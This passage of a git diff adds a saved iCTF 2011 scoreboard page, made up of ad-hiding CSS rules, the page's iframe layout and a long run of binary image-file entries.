.header_ad_div,.header_ads,.header_advertisement,.header_advertisment,.headerad,.headerad-720,.hi5-ad,.highlightsAd,.hm_advertisment,.hn-ads,.home-ad-links,.homeAd,.homeAd1,.homeAd2,.homeAdBoxA,.homeAdBoxBetweenBlocks,.homeAdBoxInBignews,.homeAdSection,.homeMediumAdGroup,.home_ad_bottom,.home_advertisement,.home_advertorial,.home_mrec_ad,.homead,.homepage-ad,.homepage300ad,.homepageFlexAdOuter,.homepageMPU,.homepage_middle_right_ad,.homepageinline_adverts,.hor_ad,.horiz_adspace,.horizontalAd,.horizontal_ad,.horizontal_ads,.horizontaltextadbox,.horizsponsoredlinks,.hortad,.houseAd1,.houseAdsStyle,.housead,.hoverad,.hp-col4-ads,.hp2-adtag,.hp_ad_cont,.hp_ad_text,.hp_t_ad,.hp_w_ad,.hpa-ad1,.html-advertisement,.ic-ads,.ico-adv,.idMultiAd,.iframe-ad,.image-advertisement,.imageAd,.imageads,.imgad,.in-page-ad,.in-story-ads,.in-story-text-ad,.inStoryAd-news2,.indEntrySquareAd,.indie-sidead,.indy_googleads,.infoBoxThreadPageRankAds,.inhousead,.inline-ad,.inline-mpu,.inline-mpu-left,.inlineSideAd,.inline_ad,.inline_ad_title,.inlinead,.inlineadsense,.inlineadtitle,.inlist-ad,.inlistAd,.inner-advt-banner-3,.innerAds,.innerad,.inpostad,.insert_advertisement,.insertad,.insideStoryAd,.inteliusAd_image,.interest-based-ad,.internalAdsContainer,.iprom-ad,.is24-adplace,.isAd,.islandAd,.islandAdvert,.islandad,.itemAdvertise,.jimdoAdDisclaimer,.jp-advertisment-promotional,.js-advert,.kdads-empty,.kdads-link,.kw_advert,.kw_advert_pair,.l_ad_sub,.label-ad,.labelads,.largeRecAdNewsContainerRight,.largeRectangleAd,.largeUnitAd,.large_ad,.lastRowAd,.lazyload_ad,.lcontentbox_ad,.leadAd,.leaderAdSlot,.leaderAdTop,.leaderAdvert,.leaderBoardAdHolder,.leaderOverallAdArea,.leader_ad,.leaderboardAd,.leaderboardAdContainer,.leaderboardAdContainerInner,.leaderboard_ad,.leaderboardad,.leaderboardadtop,.left-ad,.left-advert,.leftAd,.leftAdColumn,.leftAds,.left_ad,.left_ad_box,.left_adlink,.left_ads,.left_adsense,.leftad,.leftadtag,.leftbar_ad_160_600,.leftbarads,.leftbottomads,.leftnavad,.lgRecAd,.lg_ad,.ligatus,.linead,.link_adslider,.link_advertise,.live-search-list-ad-container,.livingsocial-ad,.ljad,.local-ads,.log_ads,.logoAds,.logoad,.logoutAd,.longAd,.longAdBox,.lowerAds,.lr-ad,.m-ad-tvguide-box,.m4-adsbygoogle,.m_banner_ads,.macAd,.macad,.main-ad,.main-advert,.main-tabs-ad-block,.mainAd,.mainLeftAd,.mainLinkAd,.mainRightAd,.main_ad,.main_ad_bg_div,.main_adbox,.main_ads,.main_intro_ad,.map_media_banner_ad,.marginadsthin,.marketing-ad,.masthead_topad,.matador_sidebar_ad_600,.mdl-ad,.media-advert,.mediaAd,.mediaAdContainer,.mediaResult_sponsoredSearch,.medium-rectangle-ad,.mediumRectangleAdvert,.medium_ad,.medrect_ad,.member-ads,.menuItemBannerAd,.menueadimg,.messageBoardAd,.mf-ad300-container,.micro_ad,.mid_ad,.mid_page_ad,.midad,.middle-ad,.middleAds,.middlead,.middleads,.min_navi_ad,.mini-ad,.miniad,.miscAd,.mmc-ad,.mmcAd_Iframe,.mod-ad-lrec,.mod-ad-n,.mod-adopenx,.mod-vertical-ad,.mod_admodule,.module-ad,.module-ad-small,.module-ads,.module-advertisement,.module-sponsored-ads,.moduleAd,.moduleAdvertContent,.module_ad,.module_box_ad,.modulegad,.moduletable-advert,.moduletable-googleads,.moduletablesquaread,.mos-ad,.mpu-ad,.mpu-ad-con,.mpu-advert,.mpu-footer,.mpu-fp,.mpu-title,.mpu-top-left,.mpu-top-left-banner,.mpu-top-right,.mpu01,.mpuAd,.mpuAdSlot,.mpuAdvert,.mpuArea,.mpuBox,.mpuContainer,.mpuHolder,.mpuTextAd,.mpu_ad,.mpu_advert,.mpu_container,.mpu_gold,.mpu_holder,.mpu_platinum,.mpu_side,.mpu_text_ad,.mpuad,.mpuholderportalpage,.mrec_advert,.ms-ads-link,.msfg-shopping-mpu,.mvw_onPageAd1,.mwaads,.my-ad250x300,.nSponsoredLcContent,.nSponsoredLcTopic,.nadvt300,.narrow_ad_unit,.narrow_ads,.navAdsBanner,.navBads,.nav_ad,.navadbox,.navcommercial,.navi_ad300,.naviad,.nba300Ad,.nbaT3Ad160,.nbaTVPodAd,.nbaTwo130Ads,.nbc_ad_carousel_wrp,.newPex_forumads,.newTopAdContainer,.newad,.newsAd,.news_article_ad_google,.newsviewAdBoxInNews,.newsvinemsn_adtype,.nexusad,.nf-adbox,.nn-mpu,.noAdForLead,.normalAds,.nrAds,.nsAdRow,.nu2ad,.oas-ad,.oas-bottom-ads,.oas_ad,.oas_advertisement,.offer_sponsoredlinks,.oio-banner-zone,.oio-link-sidebar,.oio-zone-position,.on_single_ad_box,.onethirdadholder,.openads,.openadstext_after,.openx,.openx-ad,.openx_ad,.osan-ads,.other_adv2,.outermainadtd1,.ovAdPromo,.ovAdSky,.ovAdartikel,.ov_spns,.ovadsenselabel,.pageAds,.pageBottomGoogleAd,.pageGoogleAd,.pageGoogleAdFlat,.pageGoogleAdSubcontent,.pageGoogleAds,.pageGoogleAdsContainer,.pageLeaderAd,.page_content_right_ad,.pagead,.pageads,.pagenavindexcontentad,.paneladvert,.partner-ad,.partner-ads-container,.partnerAd,.partnersTextLinks,.pencil_ad,.player_ad_box,.player_hover_ad,.player_page_ad_box,.plista_inimg_box,.pm-ad,.pmad-in2,.pnp_ad,.pod-ad-300,.podRelatedAdLinksWidget,.podSponsoredLink,.portalCenterContentAdBottom,.portalCenterContentAdMiddle,.portalCenterContentAdTop,.portal_searchresultssponsoredlist,.portalcontentad,.post-ad,.postAd,.post_ad,.post_ads,.post_sponsor_unit,.postbit_adbit_register,.postbit_adcode,.postgroup-ads,.postgroup-ads-middle,.prebodyads,.premium_ad_container,.promoAd,.promoAds,.promo_ad,.promoboxAd,.promotionTextAd,.ps-ligatus_placeholder,.pub_300x250,.pub_300x250m,.pub_728x90,.publication-ad,.publicidad,.puff-advertorials,.qa_ad_left,.qm-ad-content,.qm-ad-content-news,.quigo-ad,.qzvAdDiv,.r_ad_1,.r_ad_box,.r_ads,.rad_container,.rect_ad_module,.rectad,.rectangle-ad,.rectangleAd,.rectanglead,.redads_cont,.referrerDetailAd,.regular_728_ad,.regularad,.relatedAds,.related_post_google_ad,.relatesearchad,.remads,.resourceImagetAd,.result_ad,.reviewMidAdvertAlign,.rght300x250,.rhads,.rhs-ad,.rhs-ads-panel,.rhs-advert-container,.rhs-advert-link,.rhs-advert-title,.right-ad,.right-ad-holder,.right-ad2,.right-ads,.right-ads2,.right-sidebar-box-ad,.rightAd,.rightAdBox,.rightAdverts,.rightColAd,.rightColumnRectAd,.rightRailAd,.right_ad,.right_ad_160,.right_ad_box,.right_ad_common_block,.right_ad_text,.right_ad_top,.right_ads,.right_ads_column,.right_box_ad_rotating_container,.right_col_ad,.right_hand_advert_column,.right_side-partyad,.rightad,.rightad_1,.rightad_2,.rightadbox1,.rightads,.rightadunit,.rightbigcolumn_ads,.rightbigcolumn_ads_nobackground,.rightcol_boxad,.rightcoladvert,.rightcoltowerad,.rightmenu_ad,.rnav_ad,.rngtAd,.rot_ads,.round_box_advert,.roundedCornersAd,.roundingrayboxads,.rt_ad1_300x90,.rt_ad_300x250,.rt_ad_call,.s2k_ad,.savvyad_unit,.sb-ad-sq-bg,.sbAd,.sbAdUnitContainer,.sb_ad_holder,.sb_adsN,.sb_adsNv2,.sb_adsW,.sb_adsWv2,.scanAd,.scc_advert,.sci-ad-main,.sci-ad-sub,.search-ad,.search-results-ad,.search-sponsor,.search-sponsored,.searchAd,.searchAdTop,.searchAds,.searchSponsoredResultsBox,.searchSponsoredResultsList,.search_column_results_sponsored,.search_results_sponsored_top,.section-ad2,.section_mpu_wrapper,.section_mpu_wrapper_wrapper,.selfServeAds,.sepContentAd,.serp_sponsored,.servsponserLinks,.shoppingGoogleAdSense,.showAd_No,.showAd_Yes,.showcaseAd,.sidbaread,.side-ad,.side-ads,.side-sky-banner-160,.sideAd,.sideBoxAd,.side_ad,.side_ad2,.side_ad_1,.side_ad_2,.side_ad_3,.sidead,.sideads,.sideadsbox,.sideadvert,.sidebar-ad,.sidebar-ads,.sidebar-content-ad,.sidebar-text-ad,.sidebarAd,.sidebarAdUnit,.sidebarAdvert,.sidebar_ad,.sidebar_ad_300_250,.sidebar_ads,.sidebar_ads_336,.sidebar_adsense,.sidebar_box_ad,.sidebarad,.sidebarad_bottom,.sidebaradbox,.sidebarads,.sidebarboxad,.sideheadnarrowad,.sideheadsponsorsad,.simple_ads_manager_widget,.single-google-ad,.singleAd,.singleAdsContainer,.single_ad,.singlead,.singleadstopcstm2,.site_ad_120_600,.site_ad_300x250,.sitesponsor,.skinAd,.skin_ad_638,.sky-ad,.skyAd,.skyAdd,.skyAdvert,.skyAdvert2,.sky_ad,.sky_scraper_ad,.skyad,.skyjobsadtext,.skyscraper-ad,.skyscraper_ad,.skyscraper_bannerAdHome,.sleekadbubble,.slideshow-ad,.slpBigSlimAdUnit,.slpSquareAdUnit,.sm_ad,.smallSkyAd1,.smallSkyAd2,.small_ad,.small_ads,.smallad-left,.smallads,.smallsponsorad,.smart_ads_bom_title,.spLinks,.specialAd175x90,.speedyads,.sphereAdContainer,.spl-ads,.spl_ad,.spl_ad2,.spl_ad_plus,.splitAd,.splitAdResultsPane,.sponlinkbox,.spons-link,.spons_links,.sponslink,.sponsor-ad,.sponsor-link,.sponsor-links,.sponsor-services,.sponsorPanel,.sponsorPost,.sponsorPostWrap,.sponsorStrip,.sponsor_ad_area,.sponsor_area,.sponsor_bar,.sponsor_columns,.sponsor_footer,.sponsor_line,.sponsor_links,.sponsor_logo,.sponsoradtitle,.sponsored-ads,.sponsored-chunk,.sponsored-editorial,.sponsored-features,.sponsored-links,.sponsored-links-alt-b,.sponsored-links-holder,.sponsored-links-right,.sponsored-post,.sponsored-post_ad,.sponsored-results,.sponsored-right-border,.sponsored-text,.sponsoredBox,.sponsoredInfo,.sponsoredInner,.sponsoredLabel,.sponsoredLink,.sponsoredLinks,.sponsoredLinks2,.sponsoredLinksHeader,.sponsoredProduct,.sponsoredResults,.sponsoredSideInner,.sponsored_ads,.sponsored_box,.sponsored_box_search,.sponsored_by,.sponsored_link,.sponsored_links,.sponsored_links_title_container,.sponsored_links_title_container_top,.sponsored_links_top,.sponsored_result,.sponsored_results,.sponsored_ss,.sponsored_well,.sponsoredibbox,.sponsoredlink,.sponsoredlinks,.sponsoredlinkscontainer,.sponsoredresults,.sponsoredtextlink_container_ovt,.sponsoring_link,.sponsorlink,.sponsorlink2,.sponsormsg,.sport-mpu-box,.spotlightAd,.squareAd,.square_ad,.square_banner_ad,.squared_ad,.ss-ad-banner,.ss-ad-mpu,.standard-ad,.start__newest__big_game_container_body_games_advertising,.staticAd,.stickyAdLink,.stock-ticker-ad-tag,.stocks-ad-tag,.store-ads,.story_AD,.story_ad_div,.story_right_adv,.storyad,.subad,.subadimg,.subcontent-ad,.subtitle-ad-container,.sugarad,.super-ad,.supercommentad_left,.supercommentad_right,.supp-ads,.supportAdItem,.surveyad,.t10ad,.tab_ad,.tab_ad_area,.tablebordersponsor,.tadsanzeige,.tadsbanner,.tadselement,.tallad,.tblTopAds,.tbl_ad,.tbox_ad,.td-Adholder,.td-TrafficWeatherWidgetAdGreyBrd,.teaser-sponsor,.teaserAdContainer,.teaser_adtiles,.teaser_advert_content,.text-ad,.text-ad-links,.text-ads,.text-advertisement,.text-g-advertisement,.text-g-group-short-rec-ad,.text-g-net-grp-google-ads-article-page,.textAd,.textAdBox,.textAds,.text_ad,.text_ads,.textad,.textadContainer,.textad_headline,.textadbox,.textadheadline,.textadlink,.textads,.textads_left,.textads_right,.textadsds,.textadsfoot,.textadtext,.textadtxt,.textadtxt2,.textlink-ads,.textlinkads,.tf_page_ad_search,.thirdage_ads_300x250,.thirdage_ads_728x90,.thisIsAd,.thisIsAnAd,.ticket-ad,.tileAds,.tips_advertisement,.title-ad,.title_adbig,.tncms-region-ads,.toolad,.toolbar-ad,.top-ad,.top-ad-space,.top-ads,.top-banner-ad,.top-left-nav-ad,.top-menu-ads,.topAd,.topAdWrap,.topAds,.topAdvertisement,.topAdverts,.topBannerAd,.topLeaderboardAd,.top_Ad,.top_ad,.top_ad1,.top_ad_728,.top_ad_728_90,.top_ad_disclaimer,.top_ad_div,.top_ad_post,.top_ad_wrapper,.top_ads,.top_advert,.top_advertisement,.top_advertising_lb,.top_bar_ad,.top_container_ad,.topad,.topad-bar,.topadbox,.topads,.topadspot,.topadvertisementsegment,.topboardads,.topcontentadvertisement,.topic_inad,.topstoriesad,.toptenAdBoxA,.tourFeatureAd,.tower-ad,.towerAd,.towerAdLeft,.towerAds,.tower_ad,.tower_ad_disclaimer,.towerad,.tr-ad-adtech-placement,.tribal-ad,.ts-ad_unit_bigbox,.ts-banner_ad,.ttlAdsensel,.tto-sponsored-element,.tucadtext,.tvs-mpu,.twoColumnAd,.twoadcoll,.twoadcolr,.tx_smartadserver_pi1,.txt-ads,.txtAd,.txtAds,.txt_ads,.txtadvertise,.type_adscontainer,.type_miniad,.type_promoads,.ukAds,.ukn-banner-ads,.under_ads,.undertimyads,.unit-ad,.universalboxADVBOX01,.universalboxADVBOX03,.universalboxADVBOX04a,.usenext,.v5rc_336x280ad,.vert-ads,.vert-adsBlock,.vertad,.vertical-adsense,.vidadtext,.videoAd,.videoBoxAd,.video_ad,.view-promo-mpu-right,.view_rig_ad,.virgin-mpu,.wa_adsbottom,.wantads,.weather_ad,.webads336x280,.wide-ad,.wide-advert,.wide-skyscraper-ad,.wideAd,.wideAdTable,.wide_ad,.wide_ad_unit_top,.wide_ads,.wide_google_ads,.widget-ad,.widget-ad-codes,.widget-ad300x250,.widget-entry-ads-160,.widgetYahooAds,.widget_ad,.widget_ad_boxes_widget,.widget_ad_rotator,.widget_adrotate_widgets,.widget_advert_widget,.widget_econaabachoadswidget,.widget_island_ad,.widget_maxbannerads,.widget_sdac_bottom_ad_widget,.widget_sdac_footer_ads_widget,.widget_sdac_skyscraper_ad_widget,.wikia-ad,.wikia_ad_placeholder,.wingadblock,.withAds,.wl-ad,.wnMultiAd,.wp125_write_ads_widget,.wp125ad,.wp125ad_2,.wpn_ad_content,.wrap-ads,.wrapper-ad,.wrapper-ad-sidecol,.wsSponsoredLinksRight,.wsTopSposoredLinks,.x03-adunit,.x04-adunit,.x81_ad_detail,.xads-blk-top-hld,.xads-blk2,.xads-ojedn,.y-ads,.y-ads-wide,.y7-advertisement,.yahoo-sponsored,.yahoo-sponsored-links,.yahooAd,.yahooAds,.yahoo_ads,.yahooad,.yahooad-image,.yahooad-urlline,.yan-sponsored,.ygrp-ad,.yom-ad,.youradhere,.yrail_ad_wrap,.yrail_ads,.ysmsponsor,.ysponsor,.yw-ad,.zRightAdNote,a[href*="/adrotate/adrotate-out.php?"],a[href^="http://ad-apac.doubleclick.net/"],a[href^="http://ad-emea.doubleclick.net/"],a[href^="http://ad.doubleclick.net/"],a[href^="http://ads.pheedo.com/"],a[href^="http://adserving.liveuniversenetwork.com/"],a[href^="http://api.ringtonematcher.com/"],a[href^="http://galleries.pinballpublishernetwork.com/"],a[href^="http://galleries.securewebsiteaccess.com/"],a[href^="http://install.securewebsiteaccess.com/"],a[href^="http://latestdownloads.net/download.php?"],a[href^="http://secure.signup-page.com/"],a[href^="http://secure.signup-way.com/"],a[href^="http://www.FriendlyDuck.com/AF_"],a[href^="http://www.adbrite.com/mb/commerce/purchase_form.php?"],a[href^="http://www.firstload.de/affiliate/"],a[href^="http://www.friendlyduck.com/AF_"],a[href^="http://www.google.com/aclk?"],a[href^="http://www.liutilities.com/aff"],a[href^="http://www.liutilities.com/products/campaigns/adv/"],a[href^="http://www.my-dirty-hobby.com/?sub="],a[href^="http://www.ringtonematcher.com/"],#mbEnd[cellspacing="0"][cellpadding="0"],#mclip_container:last-child,#ssmiwdiv[jsdisplay],#tads.c,#tadsb.c,#tadsto.c,.ch[onclick="ga(this,event)"],.ra[align="left"][width="30%"],.ra[align="right"][width="30%"],div[style="background:#fbf0fa;margin:0 0 14px;min-height:0;padding-top:2px;padding-bottom:1px;padding-right:8px;padding-left:7px"],#WerbungObenRechts10_GesamtDIV,#WerbungObenRechts8_GesamtDIV,#WerbungObenRechts9_GesamtDIV,#WerbungUntenLinks4_GesamtDIV,#WerbungUntenLinks7_GesamtDIV,#WerbungUntenLinks8_GesamtDIV,#WerbungUntenLinks9_GesamtDIV,#Werbung_Content,#Werbung_Sky,#Werbung_Wide,#__ligatus_placeholder__,#ad-bereich1-08,#ad-bereich1-superbanner,#ad-bereich2-08,#ad-bereich2-skyscrapper,#ad-rechts-block,#ad-rechts-sky,#ad_gross,#ad_lang,#ad_oben,#ad_rechts,#adbox_artikel,#adkontainer,#anzeigewerbungtext,#ar_detail_werb103,#bannerwerbung,#callya_freikarte_layer,#cnt_bgwerbung,#cont-werb,#forumformwerbung,#freikarte_layer,#gonamicerror,#header_werbung,#headerwerbung,#kaufDA,#kaufDA-widget-container,#kopf-werbung,#lieferando-widget-container,#moveable_werbung,#p-links-werbung,#p-rechts-werbung,#qm_content_ad_anzeige,#reklame,#startwerbung,#t_werbung,#textwerbung,#topwerbung,#werbLayer1,#werbLayer2,#werbLayer3,#werb_ps103,#werbeadd,#werbebalken_slot,#werbebanner,#werbeblock,#werbebox,#werbebox_contentad,#werbecontainer_content,#werbecontainer_sky,#werbeflaeche,#werbetrenner,#werbung,#werbung-left,#werbung-skyscraper,#werbung1,#werbung2,#werbung3,#werbung792_2,#werbungSuperbanner,#werbung_bigsize,#werbung_footer,#werbung_mitte,#werbung_rechts,#werbung_right,#werbung_top,#werbunglink,#werbungrechts,#werbungsky,#wkr_werbung,.Artikel_Ads_News,.KomischeWerbeBox,.RessortWerbungHeader,.Werbeteaser,.Werbung,.WerbungAdpepper { display:none !important; } .WerbungDetailRectangle,.WerbungLinksRechts,.WerbungMitte,.ad_mitte,.ads_rechts,.adzeiger,.anzeigenwerbung,.bannerAnzeige,.bdeFotoGalAd,.bdeFotoGalAdText,.big-werb,.block_rs4_werbung,.bottom-werbung-box,.box_werbung_detailseite,.boxstartwerbung,.boxwerb,.boxwerbung,.content_body_right_werbung,.content_header_werbung,.content_right_side_werbewrapper,.contentwerbung4,.ecom_werbung,.firstload,.fullbanner_werbung,.gutZuWissenAd,.insidewerbung,.lokalwerbung,.rahmen_ad,.reklame,.right-content-werbung,.seitenleiste_werbung,.sponsorinaktiv,.sponsorlinkgruen,.tab_artikelwerbung,.teaser_adliste,.text_werbung,.textad_hauptlink,.topwerbung,.werbeadd_ueber,.werbebanner,.werbeflaeche,.werbung,.werbung-bigbox,.werbung-bigsize,.werbung-content,.werbung-contentad,.werbung-fullbanner,.werbung-halfbanner,.werbung-label,.werbung-leiste,.werbung-rectangle,.werbung-skyscraper,.werbung-skyscraper2,.werbung1,.werbung2,.werbung3,.werbung300,.werbung301,.werbungAnzeige,.werbungTabelle,.werbung_bereich,.werbungamazon,a[href^="http://farm.plista.com/pets"],a[href^="http://shortnews.de/gotoklick.cfm?fr_campaign_adtext_id="],a[href^="http://www.eis.de/index.phtml?refid="],a[href^="http://www.firstload.de/index.php?set_lang=de&log="],a[href^="http://www.top-of-software.de/"],a[href^="https://farm.plista.com/pets"],input[onclick^="window.open('http://www.firstload.de/affiliate/"] { display:none !important; }</style><body><div class="ictf_header"> +<center>iCTF 2011 Scoreboard</center> +</div> + + + + + +<div class="main"> +<table class="dashboard"> +<tbody><tr><td class="td_radar"> +<div class="radar"> +<iframe id="radar" src="./scoreboard.ictf2011_end.info_files/score-anim.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes. </p> +</iframe> +</div> +</td><td class="td_graph"> +<div class="graph"> +<iframe id="id-score-graph" src="./scoreboard.ictf2011_end.info_files/score-graph.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes. </p> +</iframe> +</div> +</td> +</tr> +</tbody></table> + +<div class="chart"> +<iframe src="./scoreboard.ictf2011_end.info_files/score-chart.html" width="100%" height="100%" scrolling="no" frameborder="0"> + <p>Your browser does not support iframes.</p> +</iframe> +</div> + +<div id="footer"> +</div> + + + +</div></body></html> +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._129.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._129.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._130.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._130.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._131.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._131.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._132.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._132.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._133.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._133.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._134.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._134.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._135.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._135.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._136.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._136.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._137.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._137.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._138.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._138.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._139.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._139.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._140.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._140.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._141.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._141.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._142.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._142.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._143.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._143.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._144.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._144.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._145.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._145.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._146.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._146.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._147.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._147.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._148.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._148.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._149.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._149.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._150.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._150.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._151.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._151.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._152.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._152.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._153.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._153.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._154.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._154.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._155.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._155.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._156.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._156.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._157.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._157.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._158.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._158.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._159.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._159.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._160.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._160.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._161.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._161.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._162.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._162.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._163.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._163.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._164.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._164.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._165.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._165.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._166.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._166.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._167.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._167.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._168.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._168.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._169.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._169.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._170.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._170.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._171.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._171.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._172.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._172.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._173.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._173.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._174.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._174.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._175.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._175.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._176.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._176.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._177.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._177.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._178.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._178.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._179.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._179.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._180.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._180.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._181.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._181.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._182.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._182.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._183.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._183.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._184.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._184.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._185.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._185.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._186.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._186.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._187.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._187.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._188.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._188.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._189.jpg b/ictf2011/scoreboard.ictf2011_end.info_files/._189.jpg Binary files differ. diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/._190.jpg 